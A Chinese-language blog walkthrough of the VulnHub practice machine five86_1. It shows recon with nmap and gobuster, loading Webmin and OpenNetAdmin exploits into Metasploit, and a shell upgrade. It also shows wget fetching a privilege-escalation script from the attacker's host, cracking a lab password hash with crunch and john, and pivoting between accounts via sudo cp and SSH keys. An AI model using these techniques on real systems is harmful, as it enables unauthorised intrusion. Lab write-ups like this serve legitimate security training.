『VulnHub系列』five86_1-Walkthrough

靶機地址

難度：初級+

靶機發布日期：2020年1月8日

靶機描述：Five86-1 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

博客中如有任何問題，懇請批評指正，萬分感謝。個人郵箱：[email protected]

工具、知識點和漏洞

• nmap
• metasploit
• crunch
• john
• OpenNetAdmin命令注入

0x00、信息收集

靶機IP：192.168.56.102

nmap -sn 192.168.56.0/24

端口和服務

nmap -sS -T5 192.168.56.102

http://192.168.56.102/robots.txt >> /ona（OpenNetAdmin）

首頁（80端口）打開是空白，使用curl進行確認，確實沒有內容。

10000端口運行的是Webmin，版本MiniServ 1.920

頁面、目錄枚舉

gobuster dir -u http://192.168.56.102 -w ~/Desktop/SecLists/Discovery/Web-Content/raft-large-directories.txt -x .php,.txt,.html,.zip,.bak,.tar.gz

http://192.168.56.102/reports，需要認證。

總結思路如下：

1.查找Webmin MiniServ 1.920版本是否存在可利用漏洞

2.查找OpenNetAdmin v18.1.1是否存在可利用漏洞

3.通過某種方式獲取到SSH的賬戶和密碼

4.通過某種方式獲取/reports目錄的賬戶和密碼

我一般先到exploit-db.com上去搜索，發現靶機上Webmin有一個未認證遠程命令執行漏洞，並且可以通過Metasploit進行利用。

對應的OpenNetAdmin v18.1.1存在命令注入漏洞，也可以通過Metasploit進行利用。

接下來就是使用Metasploit進行漏洞利用，但是在搜索的時候並沒有發現exploit的名稱Webmin 1.920 Unauthenticated RCE，並且也搜不到OpenNetAdmin的。

怎麼辦呢？從exploit-db上把exp下載下來拷貝到Metasploit執行的目錄/usr/share/metasploit-framework/modules/exploits/下就可以使用了。爲了方便以後的使用，這裏對exp文件進行重命名。

下載位置見下圖：

拷貝到exploit所在的目錄/usr/share/metasploit-framework/modules/exploits/

之後重新打開Metasploit就可以直接使用兩個exp了。

0x01、getshell

在使用Webmin RCE exploit的過程中發現目標的版本需要小於等於1.910版本

試試OpenNetAdmin

獲取shell之後要做的第一件事是使用Python獲取一個tty，不然有些命令是無法執行的，這一步很關鍵。

python -c 'import pty; pty.spawn("/bin/bash")' # 有些沒有安裝Python2，所以需要換成python3 -c

如果你想使用clear清屏，那麼只需要給TERM這個環境變量賦值screen即可

export TERM=screen # 賦值xterm也可以

0x02、權限提升

2020-01-23更新：新增：basic-linux-privilege-escalation

--------------------------------------------------------------Begin 套話分割線 Begin--------------------------------------------------------------

關於Linux提權，可以直接用腳本蒐集一下對於提權有用的信息，比如用linuxprivchecker.py、LinEnum.sh.

如果你想熟悉一下沒有腳本的情況下怎麼收集這些信息可以參考privilege_escalation_-_linux

先在kali上開啓HTTP服務

python -m SimpleHTTPServer 65534

使用wget下載linuxprivchecker.py腳本到靶機的tmp目錄

因爲本人所在的地理位置不允許直接訪問Github，所以我是從自己的kali下載的

cd /tmp
wget http://192.168.0.108:65534/Desktop/linuxprivchecker.py

爲了便於查看收集到的信息，我將結果輸出到report.txt文本中，之後使用less查看

python linuxprivchecker.py > report.txt
less report.txt

靶機做了這些後發現還是手動收集更快……，手動收集不到有效信息的情況下再嘗試用腳本。

-------------------------------------------------------------- End 套話分割線 End --------------------------------------------------------------

SUID權限可執行文件，發現有exim4，查看具體版本後發現是4.92。存在本地提權漏洞(local root exploit)的版本爲exim <= 4.84-3。

find / -perm -u=s -type f 2>/dev/null

常見的SUID提權可執行文件

• nmap
• vim
• less
• more
• nano
• cp
• mv
• find
• wget
• bash

當前用戶可寫文件

find / -writable -type f 2>/dev/null >/tmp/report.txt
grep -Ev '/proc|/sys' /tmp/report.txt

/var/log/ona.log爲OpenNetAdmin的日誌文件，查看之後發現無可利用內容。

/var/mail/www-data爲www-data用戶的郵件，查看之後也無可利用內容。

/tmp/LVjib是一個ELF可執行文件，使用strings命令後未發現可疑內容。

查看計劃任務，無。

cat /etc/crontab

查找sudo權限命令，需要密碼。

sudo -l

之前通過瀏覽器訪問/reports時發現需要進行身份認證，但查看該目錄並未發現什麼內容。之後想到應該看一下.htpasswd，裏面的密碼沒準可以用到。

查看之後發現加密密碼，賬戶爲系統賬戶douglas，並給出了用於爆破的密碼的規則：長度10位，包含字符串aefhrt。

這裏我們使用kali自帶的密碼字典生成工具crunch生成密碼字典。

隨後使用john進行破解，得到douglas的密碼爲fatherrrrr。

爲了方便起見，使用douglas賬戶通過SSH登錄到靶機。

執行sudo -l發現當前賬戶可以jen的權限執行cp命令。這裏的意圖也就很明顯了，就是要讓我們切換到jen賬戶上。

ssh-keygen生成密鑰，將公鑰拷貝到/home/jen/.ssh目錄下，之後使用jen賬戶登錄。

這裏有個細節，就是jen登錄之後，收到了一封郵件（見上圖）。然後我們直接查看郵件的內容。發現郵件裏包含了moss用戶的密碼Fire!Fire!

切換到moss賬戶後，重複提權的常規步驟，發現了SUID權限的/home/moss/.games/upyourgame

如果你有其他的方法，歡迎留言。要是有寫錯了的地方，請你一定要告訴我。要是你覺得這篇博客寫的還不錯，歡迎分享給身邊的人。掃描下方微信二維碼與我交流。我是ins1ght.